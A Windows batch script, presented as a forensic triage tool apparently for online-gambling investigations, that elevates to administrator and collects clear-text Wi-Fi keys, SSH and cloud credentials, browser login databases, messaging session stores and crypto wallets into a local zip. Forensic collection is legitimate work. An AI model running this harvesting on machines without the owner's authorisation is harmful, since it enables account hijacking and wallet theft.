@echo off setlocal enabledelayedexpansion color 0B :: =================================================== :: 1. AUTO-ELEVATE TO ADMINISTRATOR :: =================================================== net session >nul 2>&1 if %errorLevel% == 0 ( goto :START_PROCESS ) else ( echo [!] Hak akses Administrator diperlukan. Meminta izin sistem... powershell -Command "Start-Process '%~f0' -Verb RunAs" exit /b ) :START_PROCESS :: =================================================== :: 2. INISIALISASI FOLDER & BANNER ABOUT :: =================================================== set "TIMESTAMP=%date:~10,4%%date:~4,2%%date:~7,2%_%time:~0,2%%time:~3,2%%time:~6,2%" set "TIMESTAMP=%TIMESTAMP: =0%" set "OUTDIR=%USERPROFILE%\Desktop\JUDOL_FORENSIC_%TIMESTAMP%" cls echo =================================================== echo LOGICAL FORENSICS TRIAGE EXTRACTOR v4.0 echo Target: Programmer/Dev echo. echo Created By Rasi Tech echo =================================================== echo [+] Target Output: %OUTDIR%.zip echo [+] Memulai Ekstraksi... echo. mkdir "%OUTDIR%\01_Network_DNS" mkdir "%OUTDIR%\02_System_Activity_Logs" mkdir "%OUTDIR%\03_Dev_Infrastruktur" mkdir "%OUTDIR%\04_Cloud_SSH_Keys" mkdir "%OUTDIR%\05_Browser_Databases" mkdir "%OUTDIR%\06_Communication_Sessions" mkdir "%OUTDIR%\07_Crypto_Wallets" mkdir "%OUTDIR%\08_Remote_VPN_Logs" :: --------------------------------------------------- :: 3. NETWORK & WIFI :: --------------------------------------------------- echo [+] 1/8 Mengekstrak Network, DNS & Wifi... ipconfig /all > "%OUTDIR%\01_Network_DNS\ipconfig.txt" ipconfig /displaydns > "%OUTDIR%\01_Network_DNS\dns_cache.txt" netstat -anob > "%OUTDIR%\01_Network_DNS\active_connections.txt" 2>nul for /f "tokens=2 delims=:" %%a in ('netsh wlan show profiles ^| findstr /C:"All User Profile"') do ( set "ssid=%%a" set "ssid=!ssid:~1!" netsh wlan show profile name="!ssid!" 
key=clear > "%OUTDIR%\01_Network_DNS\wifi_!ssid!.txt" 2>nul ) :: --------------------------------------------------- :: 4. SYSTEM LOGS & CLIPBOARD :: --------------------------------------------------- echo [+] 2/8 Mengekstrak System Logs & Clipboard... wevtutil epl Security "%OUTDIR%\02_System_Activity_Logs\Security.evtx" 2>nul wevtutil epl System "%OUTDIR%\02_System_Activity_Logs\System.evtx" 2>nul powershell -Command "Get-Clipboard" > "%OUTDIR%\02_System_Activity_Logs\clipboard_last.txt" 2>nul reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist" /s > "%OUTDIR%\02_System_Activity_Logs\user_assist.txt" :: --------------------------------------------------- :: 5. DEV ARTIFACTS (Docker, Git, VS Code) :: --------------------------------------------------- echo [+] 3/8 Mengekstrak Jejak Programmer... docker ps -a > "%OUTDIR%\03_Dev_Infrastruktur\docker_containers.txt" 2>nul if exist "%USERPROFILE%\.gitconfig" copy "%USERPROFILE%\.gitconfig" "%OUTDIR%\03_Dev_Infrastruktur\" if exist "%AppData%\Code\User\globalStorage\storage.json" copy "%AppData%\Code\User\globalStorage\storage.json" "%OUTDIR%\03_Dev_Infrastruktur\vscode_recent.json" copy "C:\Windows\System32\drivers\etc\hosts" "%OUTDIR%\03_Dev_Infrastruktur\" :: --------------------------------------------------- :: 6. CLOUD & SSH KEYS (Akses Server Backend) :: --------------------------------------------------- echo [+] 4/8 Mengekstrak Cloud & SSH Keys... if exist "%USERPROFILE%\.ssh" xcopy /s /y /i "%USERPROFILE%\.ssh" "%OUTDIR%\04_Cloud_SSH_Keys\SSH" >nul 2>&1 if exist "%USERPROFILE%\.aws" xcopy /s /y /i "%USERPROFILE%\.aws" "%OUTDIR%\04_Cloud_SSH_Keys\AWS" >nul 2>&1 if exist "%USERPROFILE%\.azure" xcopy /s /y /i "%USERPROFILE%\.azure" "%OUTDIR%\04_Cloud_SSH_Keys\Azure" >nul 2>&1 :: --------------------------------------------------- :: 7. 
BROWSER DATA (Tutup Browser Terlebih Dahulu) :: --------------------------------------------------- echo [+] 5/8 Mengekstrak Browser Databases... taskkill /F /IM chrome.exe /T >nul 2>&1 taskkill /F /IM msedge.exe /T >nul 2>&1 taskkill /F /IM brave.exe /T >nul 2>&1 set "CHROME_PATH=%LocalAppData%\Google\Chrome\User Data\Default" if exist "%CHROME_PATH%\History" copy "%CHROME_PATH%\History" "%OUTDIR%\05_Browser_Databases\Chrome_History" if exist "%CHROME_PATH%\Login Data" copy "%CHROME_PATH%\Login Data" "%OUTDIR%\05_Browser_Databases\Chrome_Login" :: --------------------------------------------------- :: 8. COMMUNICATION (Telegram, Discord, WA) :: --------------------------------------------------- echo [+] 6/8 Mengekstrak Sesi Komunikasi... if exist "%AppData%\Telegram Desktop\tdata" ( xcopy /s /y /i /c "%AppData%\Telegram Desktop\tdata" "%OUTDIR%\06_Communication_Sessions\Telegram_tdata" >nul 2>&1 ) if exist "%AppData%\discord\Local Storage\leveldb" ( xcopy /s /y /i /c "%AppData%\discord\Local Storage\leveldb" "%OUTDIR%\06_Communication_Sessions\Discord_db" >nul 2>&1 ) if exist "%LocalAppData%\Packages\5319275A.WhatsAppDesktop_cv1g1gvanyjgm\LocalState" ( xcopy /s /y /i /c "%LocalAppData%\Packages\5319275A.WhatsAppDesktop_cv1g1gvanyjgm\LocalState" "%OUTDIR%\06_Communication_Sessions\WhatsApp_DB" >nul 2>&1 ) :: --------------------------------------------------- :: 9. CRYPTO WALLETS :: --------------------------------------------------- echo [+] 7/8 Mengekstrak Crypto Wallets... if exist "%AppData%\Exodus\exodus.wallet" xcopy /s /y /i "%AppData%\Exodus\exodus.wallet" "%OUTDIR%\07_Crypto_Wallets\Exodus" >nul 2>&1 if exist "%AppData%\Electrum\wallets" xcopy /s /y /i "%AppData%\Electrum\wallets" "%OUTDIR%\07_Crypto_Wallets\Electrum" >nul 2>&1 :: --------------------------------------------------- :: 10. REMOTE & VPN :: --------------------------------------------------- echo [+] 8/8 Mengekstrak Remote & VPN Logs... 
if exist "%AppData%\AnyDesk" xcopy /s /y /i "%AppData%\AnyDesk" "%OUTDIR%\08_Remote_VPN_Logs\AnyDesk" >nul 2>&1 if exist "%AppData%\TeamViewer" xcopy /s /y /i "%AppData%\TeamViewer" "%OUTDIR%\08_Remote_VPN_Logs\TeamViewer" >nul 2>&1 if exist "%USERPROFILE%\OpenVPN\config" xcopy /s /y /i "%USERPROFILE%\OpenVPN\config" "%OUTDIR%\08_Remote_VPN_Logs\OpenVPN" >nul 2>&1 :: --------------------------------------------------- :: 11. ZIPPING & CLEANUP :: --------------------------------------------------- echo. echo [+] Mengompresi semua bukti ke ZIP... powershell -Command "Compress-Archive -Path '%OUTDIR%' -DestinationPath '%OUTDIR%.zip' -Force" rd /s /q "%OUTDIR%" echo. echo =================================================== echo [BERHASIL] Proses Triage Selesai. echo File Barang Bukti: %OUTDIR%.zip echo =================================================== pause